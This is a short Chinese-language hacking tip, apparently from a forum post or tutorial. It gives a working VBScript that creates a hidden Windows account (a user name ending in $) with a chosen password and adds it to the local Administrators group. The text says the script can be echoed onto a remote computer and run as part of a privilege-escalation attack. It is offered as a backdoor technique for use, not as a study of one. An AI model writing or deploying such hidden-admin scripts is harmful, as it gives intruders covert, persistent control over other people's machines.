|
以下文件保存为vbs,同时xxxx$表示用户名,yyyy表示密码.带$符号具有帐号隐藏属性(但是用windows的计算机管理的帐号管理可以看到).
使用vbs的好处是可以通过echo 输入到远程计算机中,然后运行.(具体提权过程请参照本人相关的文章).
set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"&wsnetwork.ComputerName Set ob=GetObject(os) Set oe=GetObject(os&"/Administrators,group") Set od=ob.Create("user","xxxx$") od.SetPassword "yyyy" od.SetInfo Set of=GetObject(os&"/xxxx$",user) oe.add os&"/xxxx$"
|